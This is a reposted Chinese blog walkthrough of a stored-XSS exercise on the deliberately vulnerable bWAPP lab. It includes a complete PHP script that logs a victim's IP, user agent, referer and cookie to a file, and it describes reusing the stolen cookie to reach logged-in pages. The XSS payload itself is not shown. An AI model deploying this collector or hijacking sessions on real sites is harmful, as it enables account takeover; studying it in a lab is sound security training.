bwapp之xss(blog)
生活随笔
收集整理的這篇文章主要介紹了
bwapp之xss(blog)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
存儲型XSS,持久化,代碼是存儲在服務器中的,如在個人信息或發表文章等地方,加入代碼,如果沒有過濾或過濾不嚴,那么這些代碼將儲存到服務器中,用戶訪問該頁面的時候觸發代碼執行。這種XSS比較危險,容易造成蠕蟲,盜竊cookie等。
實驗內容:通過存儲型xss漏洞獲取用戶cookie
靶機:192.168.1.104(bwapp)
客戶機:192.168.1.103(win7)
存放獲取cookie腳本的服務器:192.1681.109(ubuntu)
?
獲取cookie的php文件代碼:
1 <?php 2 $ip = $_SERVER['REMOTE_ADDR']; 3 $user_agent = $_SERVER['HTTP_USER_AGENT']; 4 $referer = $_SERVER['HTTP_REFERER']; 5 $cookie = $_GET['hack']; 6 $content = "ip: ".$ip."\nuser_agent: ".$user_agent."\nreferer: ".$referer."\ncookie: ".$cookie."\n"; 7 $file = fopen("data.txt","a"); 8 fwrite($file,$content); 9 fclose($file); 10 header("location: http://www.baidu.com"); 11 ?>訪問靶機系統:http://192.168.1.104/bWAPP/xss_stored_1.php
輸入payload
用戶192.168.1.103將在訪問這個頁面的時候向服務器提交cookie
服務器收到請求后會在當前目錄創建一個名為data.txt的文件,存放獲取到的內容,其文件內容為:
?
現在我們已經獲取到了cookie,接下來可以使用cookie訪問用戶登錄之后才可以訪問到的內容
?
本文固定鏈接:http://www.cnblogs.com/hell0w/p/7528926.html?轉載請注明出處,謝謝!
轉載于:https://www.cnblogs.com/hell0w/p/7528926.html
總結
以上是生活随笔為你收集整理的bwapp之xss(blog)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 初试ARM开发板
- 下一篇: Hibernate——简单的增、删、改、